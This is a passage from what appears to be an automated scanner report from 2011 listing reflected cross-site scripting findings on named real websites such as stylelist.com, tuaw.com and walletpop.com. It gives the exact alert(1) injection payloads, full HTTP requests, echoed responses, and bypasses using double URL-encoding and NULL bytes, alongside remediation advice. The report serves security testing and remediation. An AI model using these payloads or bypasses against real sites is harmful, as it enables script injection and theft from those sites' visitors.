User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.654. http://www.smartmoney.com/spending/travel/skiing-with-olympic-stars-1296852410520/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8731f'-alert(1)-'e07193d9da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spending/travel/skiing-with-olympic-stars-1296852410520/?8731f'-alert(1)-'e07193d9da=1 HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb577"><a%20b%3dc>a29311a92da was submitted in the REST URL parameter 3. This input was echoed as fb577"><a b=c>a29311a92da in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/01fb577"><a%20b%3dc>a29311a92da/super-bowl-halftime-show/ HTTP/1.1
Host: www.spinner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.spinner.com/2011/02/01fb577"><a b=c>a29311a92da/super-bowl-halftime-show/" /> ...[SNIP]...
1.656. http://www.stylelist.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.stylelist.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891b1"><script>alert(1)</script>95f0c15586f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?891b1"><script>alert(1)</script>95f0c15586f=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/?891b1"><script>alert(1)</script>95f0c15586f=1" /> ...[SNIP]...
1.657. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.stylelist.com
Path: /fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41a92<a>49e23684579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fashion-week?41a92<a>49e23684579=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <span style="display:none;" id="category-name">fashion-week?41a92<a>49e23684579=1</span> ...[SNIP]...
1.658. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.stylelist.com
Path: /fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7207"-alert(1)-"dfc5f4a7abb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-week?b7207"-alert(1)-"dfc5f4a7abb=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... e + " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/fashion-week?b7207"-alert(1)-"dfc5f4a7abb=1"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
1.659. http://www.stylelist.com/fashion-week [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.stylelist.com
Path: /fashion-week
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e84"><script>alert(1)</script>e086ddef527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fashion-week?47e84"><script>alert(1)</script>e086ddef527=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/fashion-week?47e84"><script>alert(1)</script>e086ddef527=1" /> ...[SNIP]...
1.660. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.stylelist.com
Path: /hair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d1cb"-alert(1)-"f56ccd415b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hair/?9d1cb"-alert(1)-"f56ccd415b7=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... goryname + " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/hair/?9d1cb"-alert(1)-"f56ccd415b7=1"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
1.661. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.stylelist.com
Path: /hair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8549d"><script>alert(1)</script>e9794ffa46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hair/?8549d"><script>alert(1)</script>e9794ffa46b=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/hair/?8549d"><script>alert(1)</script>e9794ffa46b=1" /> ...[SNIP]...
1.662. http://www.switched.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.switched.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c7a"><script>alert(1)</script>42f5cefb086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?38c7a"><script>alert(1)</script>42f5cefb086=1 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e594"><script>alert(1)</script>89ac8e16776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/do-ipad-magazines-take-too-long-to-download/?8e594"><script>alert(1)</script>89ac8e16776=1 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/2011/02/05/do-ipad-magazines-take-too-long-to-download/?8e594"><script>alert(1)</script>89ac8e16776=1"/> ...[SNIP]...
1.664. http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.switched.com
Path: /2011/02/05/switched-roundup-top-posts-this-week/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a101e"><script>alert(1)</script>45ce8af5842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/switched-roundup-top-posts-this-week/?a101e"><script>alert(1)</script>45ce8af5842=1 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/?a101e"><script>alert(1)</script>45ce8af5842=1"/> ...[SNIP]...
1.665. http://www.switched.com/2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b1bd"><script>alert(1)</script>964d69f3398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/?1b1bd"><script>alert(1)</script>964d69f3398=1 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44cd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef000c89720 was submitted in the REST URL parameter 2. This input was echoed as 44cd3\"><script>alert(1)</script>ef000c89720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/justtellmewhattoget44cd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef000c89720 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f661%253cscript%253ealert%25281%2529%253c%252fscript%253e23e3442d45e was submitted in the REST URL parameter 2. This input was echoed as 1f661<script>alert(1)</script>23e3442d45e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/justtellmewhattoget1f661%253cscript%253ealert%25281%2529%253c%252fscript%253e23e3442d45e HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <h1>Tag: JUSTTELLMEWHATTOGET1F661<SCRIPT>ALERT(1)</SCRIPT>23E3442D45E</h1> ...[SNIP]...
1.668. http://www.switched.com/tag/justtellmewhattoget [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.switched.com
Path: /tag/justtellmewhattoget
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac663"><script>alert(1)</script>48a60cea5ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/justtellmewhattoget?ac663"><script>alert(1)</script>48a60cea5ac=1 HTTP/1.1
Host: www.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/tag/justtellmewhattoget?ac663"><script>alert(1)</script>48a60cea5ac=1"/> ...[SNIP]...
1.669. http://www.thatsfit.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.thatsfit.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9c7"><script>alert(1)</script>1dfb1b19086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7c9c7"><script>alert(1)</script>1dfb1b19086=1 HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7126"><a>63735707fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/diet-and-weight-losse7126"><a>63735707fa6/ HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.671. http://www.thatsfit.com/category/diet-and-weight-loss/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.thatsfit.com
Path: /category/diet-and-weight-loss/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389e7"><script>alert(1)</script>5ab0792cb9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/diet-and-weight-loss/?389e7"><script>alert(1)</script>5ab0792cb9c=1 HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff947"><a>4c4ae1b0797 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/fit-travelff947"><a>4c4ae1b0797/ HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.673. http://www.thatsfit.com/category/fit-travel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.thatsfit.com
Path: /category/fit-travel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a79"><script>alert(1)</script>16f61ee58dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fit-travel/?83a79"><script>alert(1)</script>16f61ee58dc=1 HTTP/1.1
Host: www.thatsfit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.674. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tuaw.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dce8"-alert(1)-"b016f7e52ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1dce8"-alert(1)-"b016f7e52ea=1 HTTP/1.1
Host: www.tuaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2127"-alert(1)-"3673c682e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/?c2127"-alert(1)-"3673c682e5a=1 HTTP/1.1
Host: www.tuaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... 65.linkInternalFilters="javascript:,tuaw.com"; s_265.mmxgo = true; s_265.prop1="Tech"; s_265.prop2="Post"; s_265.prop12="http://www.tuaw.com/2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/?c2127"-alert(1)-"3673c682e5a=1"; s_265.prop16="In Arlington, TX? Try the official Super Bowl app"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="mtc"; s_265.prop22="16"; s_265.prop9="bsd:198260 ...[SNIP]...
1.676. http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tuaw.com
Path: /2011/02/06/app-reviews-stratego-vs-the-general/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ad6"-alert(1)-"fd3328a2c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/app-reviews-stratego-vs-the-general/?c2ad6"-alert(1)-"fd3328a2c19=1 HTTP/1.1
Host: www.tuaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... Type=""; s_265.linkInternalFilters="javascript:,tuaw.com"; s_265.mmxgo = true; s_265.prop1="Tech"; s_265.prop2="Post"; s_265.prop12="http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/?c2ad6"-alert(1)-"fd3328a2c19=1"; s_265.prop16="App Reviews: Stratego vs. The General"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="mtc"; s_265.prop22="16"; s_265.prop9="bsd:19824550";
var s_ ...[SNIP]...
1.677. http://www.tuaw.com/2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe7b"-alert(1)-"26e8b01d65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/?afe7b"-alert(1)-"26e8b01d65a=1 HTTP/1.1
Host: www.tuaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44068%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e640dd7d189d was submitted in the REST URL parameter 2. This input was echoed as 44068</script><script>alert(1)</script>640dd7d189d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/tv-replay44068%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e640dd7d189d HTTP/1.1
Host: www.tvsquad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f779%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5afcbfd66ef was submitted in the REST URL parameter 2. This input was echoed as 8f779\"><script>alert(1)</script>5afcbfd66ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/tv-replay8f779%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5afcbfd66ef HTTP/1.1
Host: www.tvsquad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f492"><script>alert(1)</script>6df1859dae2 was submitted in the REST URL parameter 1. This input was echoed as 6f492"><script>alert(1)</script>6df1859dae2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%006f492"><script>alert(1)</script>6df1859dae2/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 35506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/%006f492"><script>alert(1)</script>6df1859dae2/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5064"><script>alert(1)</script>ee513e89ec6 was submitted in the REST URL parameter 1. This input was echoed as f5064"><script>alert(1)</script>ee513e89ec6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%00f5064"><script>alert(1)</script>ee513e89ec6/02/03/1040-tax-forms-which-one-should-you-use/ HTTP/1.1
Host: www.walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:52:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
